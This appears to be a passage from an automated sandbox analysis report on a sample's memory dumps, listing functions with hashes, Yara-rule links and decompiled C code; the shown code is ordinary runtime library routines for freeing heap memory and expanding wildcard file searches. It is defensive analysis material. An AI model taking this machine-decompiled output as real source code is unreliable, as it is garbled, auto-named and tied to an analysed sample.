_free.LIBCMT ref: 030555E2

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6d2d583b1334b5f3b1b08f55b8bb08f7d7543dc903b372f84ad1f3acd2eb1875
Instruction ID: 6401b8343e22724a7d788972d3f58b68b6ba59d73d2aa65c500969111fc25509
Opcode Fuzzy Hash: 6d2d583b1334b5f3b1b08f55b8bb08f7d7543dc903b372f84ad1f3acd2eb1875
Instruction Fuzzy Hash: 59F06272416314AFCA64DF55FCE1E4BB3DEAB423203A94809F847DB950CB30F9808660

Uniqueness

Uniqueness Score: -1.00%

Function 0303BC02, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0303BC1A

Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67

_free.LIBCMT ref: 0303BC2C
_free.LIBCMT ref: 0303BC3E
_free.LIBCMT ref: 0303BC50
_free.LIBCMT ref: 0303BC62

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 08784d9304962b264735e9288e52a06cac758de2e80e72d30e7e79d5e183fac1
Instruction ID: d4ab0d0904a91796725b77d83df3d99771f17d5f782ffaf361ddf6ec9e285165
Opcode Fuzzy Hash: 08784d9304962b264735e9288e52a06cac758de2e80e72d30e7e79d5e183fac1
Instruction Fuzzy Hash: 7CF012FA527300BBE670EA55F6C1C5AB3DDFB46B547685809F058DB600CF38F9808694

Uniqueness

Uniqueness Score: -1.00%

Function 6D86C96F, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86C96F(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6d877708; // 0x6d877758
					if(_t23 != 0) {
						E6D867CC2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6d87770c; // 0x6d8c1a54
					if(_t24 != 0) {
						E6D867CC2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6d877710; // 0x6d8c1a54
					if(_t25 != 0) {
						E6D867CC2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6d877738; // 0x6d87775c
					if(_t26 != 0) {
						E6D867CC2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6d87773c; // 0x6d8c1a58
					if(_t27 != 0) {
						return E6D867CC2(_t6);
					}
				}
				return _t6;
			}

0x6d86c975
0x6d86c97a
0x6d86c97e
0x6d86c984
0x6d86c987
0x6d86c98c
0x6d86c990
0x6d86c996
0x6d86c999
0x6d86c99e
0x6d86c9a2
0x6d86c9a8
0x6d86c9ab
0x6d86c9b0
0x6d86c9b4
0x6d86c9ba
0x6d86c9bd
0x6d86c9c2
0x6d86c9c3
0x6d86c9c6
0x6d86c9cc
0x00000000
0x6d86c9d4
0x6d86c9cc
0x6d86c9d7

APIs

_free.LIBCMT ref: 6D86C987

Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA

_free.LIBCMT ref: 6D86C999
_free.LIBCMT ref: 6D86C9AB
_free.LIBCMT ref: 6D86C9BD
_free.LIBCMT ref: 6D86C9CF

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d7960a81077e2c3b70a6045a984649efacec8e238e15f4dac2b3e1ee74c87019
Instruction ID: 56d23a9adf57b08d1f93aec1180b620a1e7acea7b30cac5fc5c761387d354593
Opcode Fuzzy Hash: d7960a81077e2c3b70a6045a984649efacec8e238e15f4dac2b3e1ee74c87019
Instruction Fuzzy Hash: 80F03C71A0869567CB00CA6CE98CE2A77E9EA063703615C05F118D7A0ACB30F880C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 03069A93, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03069C2D

Strings

*?, xrefs: 03069AD6

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: ea6d617d872e08b4dda1ad599ceca42be339af1135a4dd483ddd6d01a7a467d0
Instruction ID: cc91a18cc8b347bb9859281199bdd827ae802af160659a294195788dc39a67d1
Opcode Fuzzy Hash: ea6d617d872e08b4dda1ad599ceca42be339af1135a4dd483ddd6d01a7a467d0
Instruction Fuzzy Hash: BC614E75E012199FDF14DFA8C9805EDFBF9EF88320B1881AAD855E7704E771AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 03039ADE, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 03039C78

Strings

*?, xrefs: 03039B21

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: f43978f0378dcc461f357f0057556c23c851ec20f60f8e4bb2fcbb969ddee30d
Instruction ID: d469817268035100b883854ee500d73b94edb27fccbcdf905f788fb9c1054213
Opcode Fuzzy Hash: f43978f0378dcc461f357f0057556c23c851ec20f60f8e4bb2fcbb969ddee30d
Instruction Fuzzy Hash: CC614FB6E012199FDB14CFA8C9805EDFBF9FF89310B1881A9D855E7300D7719E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 03052F65, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 030530FF

Strings

*?, xrefs: 03052FA8

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 67db46bfe3e73b36354a24cd1ef346c3b51c06d45680648de54be88c8fd1ccb1
Instruction ID: 8cd5fa55a0259f9ec861b08138b962f05a0233a4878f87d1ac3dccf7d40dd8f2
Opcode Fuzzy Hash: 67db46bfe3e73b36354a24cd1ef346c3b51c06d45680648de54be88c8fd1ccb1
Instruction Fuzzy Hash: C261307AD012199FDF14CFA9C8806EEFBF9EF88350B1985A9E855E7300D7719E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D868686, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D868686(void* __ebx, void* __edi, void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebp;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t205;
				signed int _t207;
				signed int _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				signed int* _t220;
				signed int _t223;
				void* _t226;
				union _FINDEX_INFO_LEVELS _t227;
				intOrPtr _t230;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				intOrPtr* _t240;
				signed int _t242;
				intOrPtr* _t245;
				signed int _t250;
				signed int _t256;
				signed int _t258;
				signed int _t264;
				intOrPtr* _t265;
				signed int _t273;
				signed int _t275;
				intOrPtr* _t276;
				void* _t278;
				intOrPtr* _t279;
				signed int _t282;
				signed int _t285;
				signed int _t287;
				intOrPtr _t289;
				signed int* _t294;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				void* _t302;
				void* _t303;
				signed int _t305;
				void* _t309;
				signed int _t310;
				void* _t311;
				void* _t312;
				void* _t313;
				signed int _t314;
				void* _t315;
				void* _t316;

				_t131 = _a8;
				_t312 = _t311 - 0x28;
				_t320 = _t131;
				if(_t131 != 0) {
					_t294 = _a4;
					_t223 = 0;
					 *_t131 = 0;
					_t285 = 0;
					_t132 =  *_t294;
					_t233 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t223;
						_t134 = _t233 - _t285;
						_t295 = _t285;
						_v12 = _t295;
						_t272 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t233 - _t295;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t297 =  !_t295 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t297;
						if(_t297 != 0) {
							_t214 = _t285;
							_t282 = _t223;
							do {
								_t265 =  *_t214;
								_t20 = _t265 + 1; // 0x1
								_v20 = _t20;
								do {
									_t216 =  *_t265;
									_t265 = _t265 + 1;
									__eflags = _t216;
								} while (_t216 != 0);
								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6D8672E5(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6D86B297(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6D8669AE();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6D868473(_t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6D86B297(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6D868C70(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6D867CC2(_t302);
														_t305 = _v12;
													}
													E6D867CC2(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6D86B297(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6D8669AE();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x6d877014; // 0x6a907f72
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6D86B2F0(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6D868669(_t245 - _t289 + 1, _t289,  &_v676, E6D868B7D(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6D86859A( &(_v608.cFileName),  &_v640,  &_v609, E6D868B7D(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6D867CC2(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6D867CC2(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6D86ADA0(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6D8684D0);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E6D867CC2(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E6D864095(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6D867CC2(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6D86B2B0(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6D867CC2( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6D867CC2(_t285);
						goto L31;
					}
				} else {
					_t220 = E6D866A5B(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6D86699E();
					L31:
					return _t299;
				}
				L81:
			}

0x6d86868b
0x6d86868e
0x6d868692
0x6d868694
0x6d8686aa
0x6d8686ae
0x6d8686b1
0x6d8686b3
0x6d8686b5
0x6d8686b7
0x6d8686b9
0x6d8686bc
0x6d8686bf
0x6d8686c2
0x6d8686c4
0x6d868727
0x6d868729
0x6d86872c
0x6d86872e
0x6d868732
0x6d86873b
0x6d86873c
0x6d86873f
0x6d868741
0x6d868744
0x6d868748
0x6d868748
0x6d86874a
0x6d86874c
0x6d86874e
0x6d868750
0x6d868750
0x6d868752
0x6d868755
0x6d868758
0x6d868758
0x6d86875a
0x6d86875b
0x6d86875b
0x6d868766
0x6d868768
0x6d86876b
0x6d86876c
0x6d86876f
0x6d86876f
0x6d868773
0x6d868776
0x6d868779
0x6d868779
0x6d868779
0x6d868786
0x6d868788
0x6d86878b
0x6d86878d
0x6d8687a5
0x6d8687a8
0x6d8687ab
0x6d8687ad
0x6d8687b0
0x6d8687b2
0x6d8687b5
0x6d8687b8
0x6d868815
0x6d868818
0x6d86881b
0x6d86881d
0x00000000
0x6d8687ba
0x6d8687bc
0x6d8687bc
0x6d8687be
0x6d8687c1
0x6d8687c1
0x6d8687c3
0x6d8687c5
0x6d8687cb
0x6d8687ce
0x6d8687ce
0x6d8687d0
0x6d8687d1
0x6d8687d1
0x6d8687d8
0x6d8687db
0x6d8687df
0x6d8687ec
0x6d8687f1
0x6d8687f4
0x6d8687f6
0x6d86886a
0x6d86886b
0x6d86886c
0x6d86886d
0x6d86886e
0x6d86886f
0x6d868874
0x6d868878
0x6d86887a
0x6d86887b
0x6d86887e
0x6d86887e
0x6d868881
0x6d868881
0x6d868883
0x6d868884
0x6d868884
0x6d868888
0x6d868889
0x6d868890
0x6d868893
0x6d868896
0x6d868898
0x6d8688a0
0x6d8688a1
0x6d8688a2
0x6d8688a5
0x6d8688af
0x6d8688b3
0x6d8688b5
0x6d8688c9
0x6d8688c9
0x6d8688cc
0x6d8688d6
0x6d8688db
0x6d8688de
0x6d8688e0
0x00000000
0x6d8688e2
0x6d8688e2
0x6d8688e7
0x6d8688ee
0x6d8688f1
0x6d8688f3
0x6d868904
0x6d868906
0x6d868908
0x6d868908
0x6d868908
0x6d8688f5
0x6d8688f6
0x6d8688fb
0x6d8688fe
0x6d86890d
0x6d868913
0x00000000
0x6d868916
0x6d8688b7
0x6d8688b7
0x6d8688bd
0x6d8688c2
0x6d8688c5
0x6d8688c7
0x6d868919
0x6d86891b
0x6d86891c
0x6d86891d
0x6d86891e
0x6d86891f
0x6d868920
0x6d868925
0x6d868928
0x6d868929
0x6d86892b
0x6d868931
0x6d868938
0x6d86893b
0x6d86893e
0x6d868941
0x6d868942
0x6d868943
0x6d868946
0x6d86894c
0x6d86894e
0x6d868950
0x6d868950
0x6d868952
0x6d868954
0x00000000
0x00000000
0x6d868956
0x6d868958
0x6d86895a
0x6d86895c
0x6d868967
0x6d868969
0x6d86896b
0x00000000
0x00000000
0x6d86896b
0x6d86895c
0x00000000
0x6d868958
0x6d86896d
0x6d86896d
0x6d868973
0x6d868975
0x6d86897b
0x6d86897d
0x6d86899f
0x6d86899f
0x6d8689a1
0x6d8689a3
0x6d8689af
0x6d8689af
0x6d8689a5
0x6d8689a5
0x6d8689a7
0x00000000
0x6d8689a9
0x6d8689a9
0x6d8689ab
0x6d8689ad
0x00000000
0x00000000
0x6d8689ad
0x6d8689a7
0x6d8689b7
0x6d8689bf
0x6d8689c5
0x6d8689c6
0x6d8689c8
0x6d8689d0
0x6d8689d6
0x6d8689dc
0x6d8689e2
0x6d8689f6
0x6d8689fb
0x6d868a06
0x6d868a16
0x6d868a1c
0x6d868a1e
0x6d868a21
0x6d868a44
0x6d868a44
0x6d868a49
0x6d868a4f
0x6d868a4f
0x6d868a55
0x6d868a5b
0x6d868a61
0x6d868a67
0x6d868a6d
0x6d868a8e
0x6d868a93
0x6d868a98
0x6d868a9c
0x6d868aa2
0x6d868aa5
0x6d868ab8
0x6d868ab8
0x6d868abe
0x6d868ac4
0x6d868ac5
0x6d868ac6
0x6d868acb
0x6d868ace
0x6d868ad4
0x6d868ad6
0x6d868b34
0x6d868b3a
0x6d868b42
0x6d868b47
0x6d868b4d
0x6d868b4e
0x00000000
0x00000000
0x00000000
0x6d868aa7
0x6d868aa7
0x6d868aaa
0x6d868aac
0x00000000
0x6d868aae
0x6d868aae
0x6d868ab1
0x00000000
0x6d868ab3
0x6d868ab3
0x6d868ab6
0x00000000
0x00000000
0x00000000
0x00000000
0x6d868ab6
0x6d868ab1
0x6d868aac
0x6d868b50
0x6d868b51
0x00000000
0x6d868ad8
0x6d868ad8
0x6d868ade
0x6d868ae6
0x6d868aeb
0x6d868afa
0x6d868afa
0x6d868b02
0x6d868b08
0x6d868b0e
0x6d868b15
0x6d868b18
0x6d868b1a
0x6d868b2a
0x6d868b2f
0x00000000
0x6d868a23
0x6d868a23
0x6d868a29
0x6d868a2a
0x6d868a2b
0x6d868a2c
0x6d868a34
0x6d868a34
0x6d868b57
0x6d868b57
0x6d868b5f
0x6d868b67
0x6d868b6c
0x6d86897f
0x6d868982
0x6d868984
0x6d868999
0x00000000
0x6d868986
0x6d868986
0x6d868989
0x6d86898a
0x6d86898b
0x6d86898c
0x6d868991
0x6d868984
0x6d868b73
0x6d868b7c
0x00000000
0x00000000
0x00000000
0x6d8688c7
0x6d86889a
0x6d86889c
0x6d86889d
0x6d86889f
0x6d86889f
0x00000000
0x00000000
0x00000000
0x00000000
0x6d8687f8
0x6d8687f8
0x6d8687fe
0x6d868801
0x6d868804
0x6d868807
0x6d86880a
0x6d86880d
0x6d868810
0x6d868810
0x00000000
0x6d8687c1
0x6d86878f
0x6d86878f
0x6d868792
0x6d86881f
0x6d868820
0x6d868825
0x00000000
0x6d868825
0x6d8686c6
0x6d8686c6
0x6d8686c9
0x6d8686d1
0x6d8686d4
0x6d8686db
0x6d8686dd
0x6d8686df
0x6d8686fa
0x6d8686fb
0x6d8686fc
0x6d8686fd
0x6d868702
0x6d868705
0x6d868708
0x6d8686e1
0x6d8686e1
0x6d8686e4
0x6d8686e5
0x6d8686e6
0x6d8686e7
0x6d8686e8
0x6d8686ed
0x6d8686ef
0x6d8686f2
0x6d8686f2
0x6d86870a
0x6d86870c
0x00000000
0x00000000
0x6d868715
0x6d868718
0x6d86871b
0x6d86871d
0x6d86871f
0x00000000
0x6d868721
0x6d868721
0x6d868724
0x00000000
0x6d868724
0x00000000
0x6d86871f
0x6d86879a
0x6d868826
0x6d868829
0x6d86882d
0x6d868836
0x6d868839
0x6d86883d
0x6d86883d
0x6d86883f
0x6d868842
0x6d868844
0x6d868846
0x6d868848
0x6d86884d
0x6d86884e
0x6d868852
0x6d868852
0x6d868856
0x6d868859
0x6d868859
0x6d86885d
0x00000000
0x6d868864
0x6d868696
0x6d868696
0x6d86869d
0x6d86869e
0x6d8686a0
0x6d868865
0x6d868869
0x6d868869
0x00000000

APIs

_free.LIBCMT ref: 6D868820

Strings

*?, xrefs: 6D8686C9

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c75a2ad59e0c041727f9921a7f737aa3d5d6dad7299e3ecf3ba430c038b1c415
Instruction ID: 1f44ef9827624fde032d7c1c81c7c17268b4bb2b6d4aa8218b9ffe45f77e94a5
Opcode Fuzzy Hash: c75a2ad59e0c041727f9921a7f737aa3d5d6dad7299e3ecf3ba430c038b1c415
Instruction Fuzzy Hash: 39619EB5E0425AAFCB04CFA9C8845EDFBF5EF49320B158569E918F7340D730AE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03038655, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 030386DF

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 21d9766ffed661443d41726d093e7c48fa334fdd5e103aaeb707956e1c14e358
Instruction ID: aaf4ef41984f13350a647e5dd123cd34822031cafa47602936d0e88c98ac0f77
